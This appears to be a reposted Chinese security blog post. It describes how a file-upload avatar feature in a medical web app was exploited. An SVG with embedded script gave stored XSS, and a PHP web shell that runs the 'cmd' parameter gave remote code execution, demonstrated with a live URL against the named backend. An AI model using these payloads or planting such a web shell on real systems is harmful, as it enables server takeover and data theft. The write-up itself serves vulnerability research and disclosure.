通过文件上传所获取的RCE
2023-10-24 11:17:37 Author: mp.weixin.qq.com(查看原文) 阅读量:10 收藏

正文

本文主要解释的是如何通过文件上传来获取存储类型的XSS和RCE

复现过程

首先以医生的身份创建电子邮件,确认电子邮件并登陆之后,其将我重定向到主页

注意到有个上传功能,可以上传头像

这里我们上传头像,使用 Burpsuit 拦截上传过程并将请求发送到中继器(repeater)来查看响应

这里创建一个包含xss payload的SVG文件:

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/>
<script type=”text/javascript”>
alert(“xss”);
</script>
</svg>

在站点中上传.svg文件,获取路径并粘贴到浏览器中。请注意上图中的url参数,它是可控的!

这里发现了一个xss

下面将尝试上传一个php文件以获取RCE

<?php

if(isset($
_GET[‘cmd’]))
{
system($_GET[‘cmd’]);
}

?>

上传之后发现,目标没有对扩展名或者是内容类型进行检查,故这里对SVG文件进行同样的操作,并将其粘贴在浏览器中添加CMD参数

https://backend.dermai.app/storage/2022/10/07/fdd8123d3472face5167b9bd9147d9102594fde9.php?cmd=pwd

这里发现起作用了!打完收工!

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247492369&idx=1&sn=73f01a0f25db02cd603a27ad0eae838b&chksm=e8a5e972dfd26064bbe00bbeaf8ce39eb292945db2cf94ff11bfc49bd270a3fac11f2d0fa338&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh